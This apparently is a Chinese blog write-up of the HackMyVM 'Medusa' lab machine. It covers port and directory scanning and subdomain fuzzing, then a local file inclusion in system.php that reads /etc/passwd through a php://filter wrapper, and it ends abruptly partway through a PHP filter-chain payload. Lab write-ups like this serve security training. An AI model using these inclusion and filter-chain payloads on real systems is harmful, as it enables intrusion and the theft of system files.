{"id":633,"date":"2024-04-26T17:53:55","date_gmt":"2024-04-26T09:53:55","guid":{"rendered":"http:\/\/162.14.82.114\/?p=633"},"modified":"2024-04-26T17:54:59","modified_gmt":"2024-04-26T09:54:59","slug":"hmv-_-medusa","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/633\/04\/26\/2024\/","title":{"rendered":"hmv[-_-]Medusa"},"content":{"rendered":"

Medusa<\/h1>\n

\"image-20240426160253918\"<\/div><\/p>\n

\"image-20240426160436448\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/medusa]\n\u2514\u2500$ rustscan -a 192.168.0.109 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.109:21\nOpen 192.168.0.109:22\nOpen 192.168.0.109:80\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\nWarning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP\/1\\.1 \\d\\d\\d (?:[^\\r\\n]*\\r\\n(?!\\r\\n))*?.*\\r\\nServer: Virata-EmWeb\/R([\\d_]+)\\r\\nContent-Type: text\/html; ?charset=UTF-8\\r\\nExpires: .*<title>HP (Color |)LaserJet ([\\w._ -]+)   '\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-26 04:05 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.00s elapsed\nInitiating Ping Scan at 04:05\nScanning 192.168.0.109 [2 ports]\nCompleted Ping Scan at 04:05, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 04:05\nCompleted Parallel DNS resolution of 1 host. at 04:05, 0.00s elapsed\nDNS resolution of 1 IPs took 0.00s. Mode: Async [#: 3, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 04:05\nScanning medusa (192.168.0.109) [3 ports]\nDiscovered open port 80\/tcp on 192.168.0.109\nDiscovered open port 22\/tcp on 192.168.0.109\nDiscovered open port 21\/tcp on 192.168.0.109\nCompleted Connect Scan at 04:05, 0.00s elapsed (3 total ports)\nInitiating Service scan at 04:05\nScanning 3 services on medusa (192.168.0.109)\nCompleted Service scan at 04:05, 6.08s elapsed (3 services on 1 host)\nNSE: Script scanning 192.168.0.109.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 2.52s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.03s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.00s elapsed\nNmap scan report for medusa (192.168.0.109)\nHost is up, received syn-ack (0.00037s latency).\nScanned at 2024-04-26 04:05:03 EDT for 9s\n\nPORT   STATE SERVICE REASON  VERSION\n21\/tcp open  ftp     syn-ack vsftpd 3.0.3\n22\/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n|   3072 70:d4:ef:c9:27:6f:8d:95:7a:a5:51:19:51:fe:14:dc (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDv4Q5cpQcRXYQ70CJSzZRxXFH6tuoJTM53mCVczFIZ2Urzv0s\/jbfw\/HqDxogNi2VTulyIaV2Qjbif+LG4h\/PV5omSnTjLbaIoHEqy1ADJk0jXsMCGy31Iezmdh70UFtjMUP+\/HIGvDmpckPPKzG1\/OKUnctNSHEzkIRjqCAKC9\/XRdnREcKd6QEWVMk4dGlwdcCWLu6RyRGYb9ytIxO1CJI9\/b911PDv1qOFRw3xEPbyXxDHQO+aKRfDWYfWHZPzi\/LwDTgKZ7CuV2cz0uFE+nM+5aeIuyffkT4ViezkLNbCOlkdpi1D3fGlQhRrMtDP9mUpjENJwyB95QCdbT+yLuBkIDdNL59i4vZN2AS\/L307QF6kh\/37hy8scksq\/eDWrxhOhhyTcATwSV9ZeiWm5O7VgIxY\/8Q4GlqeSTMXY4HZS\/oLu+ABvB\/Rv3PVV2WEoZKgpWdgFbFpo0TRuaE7jlRa5ertqrQiCVAPAb8crAMDDaMtcmoSz\/FHA5aKu45U=\n|   256 3f:8d:24:3f:d2:5e:ca:e6:c9:af:37:23:47:bf:1d:28 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLAG2BM8Qp6PJMrgKjDrMPVgCsANoTZTePFUDsc0gYJkZUWPt04uYyBAzPuxSf6U0UQPN846rYWaBeHavSfLRKc=\n|   256 0c:33:7e:4e:95:3d:b0:2d:6a:5e:ca:39:91:0d:13:08 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN+WcY1Uu0g6LNsI0roz56ThI9v7ogotmKl2wgTviIHx\n80\/tcp open  http    syn-ack Apache httpd 2.4.54 ((Debian))\n|_http-server-header: Apache\/2.4.54 (Debian)\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-title: Apache2 Debian Default Page: It works\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 9.40 seconds<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.109 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.109\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              bak,jpg,txt,html,php,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/index.html           (Status: 200) [Size: 10674]\n\/.php                 (Status: 403) [Size: 278]\n\/manual               (Status: 301) [Size: 315] [--> http:\/\/192.168.0.109\/manual\/]\n\/.php                 (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\n\/hades                (Status: 301) [Size: 314] [--> http:\/\/192.168.0.109\/hades\/]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20240426160731950\"<\/div>
\n
\"image-20240426161545564\"<\/div><\/p>\n
Kraken<\/code><\/pre>\n
\u7aef\u53e3\u63a2\u6d4b<\/h3>\n
21\u7aef\u53e3\u4e0d\u80fd\u533f\u540d\u767b\u5f55\u3002\u3002\u3002<\/p>\n
\u654f\u611f\u76ee\u5f55<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.109\/hades -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.109\/hades\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              zip,bak,jpg,txt,html,php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 278]\n\/index.php            (Status: 200) [Size: 0]\n\/.html                (Status: 403) [Size: 278]\n\/door.php             (Status: 200) [Size: 555]\n\/.php                 (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ curl http:\/\/192.168.0.109\/hades\/door.php -X POST -d "word=Kraken"           \n<!DOCTYPE html>\n<html lang="en">\n<head>\n    <meta charset="UTF-8">\n    <meta http-equiv="X-UA-Compatible" content="IE=edge">\n    <meta name="viewport" content="width=device-width, initial-scale=1.0">\n    <link rel="stylesheet" href="styles.css">\n\n    <title>Door<\/title>\n<\/head>\n<body>\n <form action="d00r_validation.php" method="POST">\n    <label for="word">Please enter the magic word...<\/label>\n    <input id="word" type="text" required maxlength="6" name="word">\n    <input type="submit" value="submit">\n <\/form>\n<\/body>\n<\/html>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ curl http:\/\/192.168.0.109\/hades\/d00r_validation.php -X POST -d "word=Kraken"\n<head>\n    <link rel="stylesheet" href="styles.css">\n    <title>Validation<\/title>\n<\/head>\n<source><marquee>medusa.hmv<\/marquee><\/source><\/code><\/pre>\n
\u5c1d\u8bd5\u66f4\u65b0dns\u89e3\u6790\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ sudo su                    \n[sudo] password for kali: \n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# vim \/etc\/hosts<\/code><\/pre>\n
192.168.0.109   medusa.hmv<\/code><\/pre>\n
FUZZ\u57df\u540d<\/h3>\n
\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff0c\u53d1\u73b0\u6ca1\u53d8\u5316\uff0c\u5c1d\u8bd5FUZZ\uff01<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# ffuf -u http:\/\/medusa.hmv -H 'Host: FUZZ.medusa.hmv' -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt -fw 3423\n\n        \/'___\\  \/'___\\           \/'___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/medusa.hmv\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt\n :: Header           : Host: FUZZ.medusa.hmv\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response words: 3423\n________________________________________________\n\ndev                     [Status: 200, Size: 1973, Words: 374, Lines: 26, Duration: 1026ms]\n:: Progress: [114441\/114441] :: Job [1\/1] :: 1886 req\/sec :: Duration: [0:01:02] :: Errors: 0 ::<\/code><\/pre>\n
\u6dfb\u52a0\u4e00\u4e0b\uff1a<\/p>\n
192.168.0.109   dev.medusa.hmv <\/code><\/pre>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# gobuster dir -u "http:\/\/dev.medusa.hmv\/" -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -x php,txt,zip,bak,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/dev.medusa.hmv\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,txt,zip,bak,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 279]\n\/index.html           (Status: 200) [Size: 1973]\n\/.php                 (Status: 403) [Size: 279]\n\/files                (Status: 301) [Size: 316] [--> http:\/\/dev.medusa.hmv\/files\/]\n\/assets               (Status: 301) [Size: 317] [--> http:\/\/dev.medusa.hmv\/assets\/]\n\/css                  (Status: 301) [Size: 314] [--> http:\/\/dev.medusa.hmv\/css\/]\n\/manual               (Status: 301) [Size: 317] [--> http:\/\/dev.medusa.hmv\/manual\/]\n\/robots.txt           (Status: 200) [Size: 489]\n\/.php                 (Status: 403) [Size: 279]\n\/.html                (Status: 403) [Size: 279]\n\/server-status        (Status: 403) [Size: 279]\nProgress: 1323360 \/ 1323366 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# gobuster dir -u "http:\/\/dev.medusa.hmv\/files" -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -x php,txt,zip,bak,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/dev.medusa.hmv\/files\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              bak,html,php,txt,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 279]\n\/index.php            (Status: 200) [Size: 0]\n\/.html                (Status: 403) [Size: 279]\n\/system.php           (Status: 200) [Size: 0]\n\/readme.txt           (Status: 200) [Size: 144]\n\/.php                 (Status: 403) [Size: 279]\n\/.html                (Status: 403) [Size: 279]\nProgress: 1323360 \/ 1323366 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u770b\u4e00\u4e0b\u6709\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# curl http:\/\/dev.medusa.hmv\/files\/readme.txt\n-----------------------------------------------\n+  Don't trust your eyes, trust your instinct +\n-----------------------------------------------\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# curl http:\/\/dev.medusa.hmv\/files\/system.php<\/code><\/pre>\n
\u5c1d\u8bd5fuzz\u4e00\u4e0b\u76f8\u5173\u7684\u53c2\u6570\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# ffuf -u http:\/\/dev.medusa.hmv\/files\/system.php?FUZZ=\/etc\/passwd -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -fw 1\n\n        \/'___\\  \/'___\\           \/'___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/dev.medusa.hmv\/files\/system.php?FUZZ=\/etc\/passwd\n :: Wordlist         : FUZZ: \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response words: 1\n________________________________________________\n\nview                    [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 1ms]\n:: Progress: [220560\/220560] :: Job [1\/1] :: 4347 req\/sec :: Duration: [0:00:44] :: Errors: 0 ::<\/code><\/pre>\n
\u65b9\u6cd5\u4e00\uff1aLFI\u4e0ephp filter\u94fe<\/h3>\n
\u5c1d\u8bd5\u6267\u884cLFI\uff01<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# curl http:\/\/dev.medusa.hmv\/files\/system.php?view=\/etc\/passwdroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nspectre:x:1000:1000:spectre,,,:\/home\/spectre:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nftp:x:106:113:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin<\/code><\/pre>\n
\u5c1d\u8bd5\u5305\u542b\u4e00\u4e0b\u5176\u4ed6\u6587\u4ef6\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# curl http:\/\/dev.medusa.hmv\/files\/system.php?view=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd\ncm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KZ25hdHM6eDo0MTo0MTpHbmF0cyBCdWctUmVwb3J0aW5nIFN5c3RlbSAoYWRtaW4pOi92YXIvbGliL2duYXRzOi91c3Ivc2Jpbi9ub2xvZ2luCm5vYm9keTp4OjY1NTM0OjY1NTM0Om5vYm9keTovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwMDo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMToxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMjoxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDk6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLXRpbWVzeW5jOng6MTA0OjExMDpzeXN0ZW1kIFRpbWUgU3luY2hyb25pemF0aW9uLCwsOi9ydW4vc3lzdGVtZDovdXNyL3NiaW4vbm9sb2dpbgpzc2hkOng6MTA1OjY1NTM0OjovcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4Kc3BlY3RyZTp4OjEwMDA6MTAwMDpzcGVjdHJlLCwsOi9ob21lL3NwZWN0cmU6L2Jpbi9iYXNoCnN5c3RlbWQtY29yZWR1bXA6eDo5OTk6OTk5OnN5c3RlbWQgQ29yZSBEdW1wZXI6LzovdXNyL3NiaW4vbm9sb2dpbgpmdHA6eDoxMDY6MTEzOmZ0cCBkYWVtb24sLCw6L3Nydi9mdHA6L3Vzci9zYmluL25vbG9naW4K                                                                                                                                                        \n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# curl http:\/\/dev.medusa.hmv\/files\/system.php?view=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd | base64 -d\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100  1936  100  1936    0     0  1103k      0 --:--:-- --:--:-- --:--:-- 1890k\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nspectre:x:1000:1000:spectre,,,:\/home\/spectre:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nftp:x:106:113:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin<\/code><\/pre>\n
\u725b\u903c\uff0c\u5c1d\u8bd5php_filter_chain_generator<\/code>\u6784\u9020\u76f8\u5173\u94fe\uff1a<\/p>\n
http:\/\/dev.medusa.hmv\/files\/system.php?view=php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.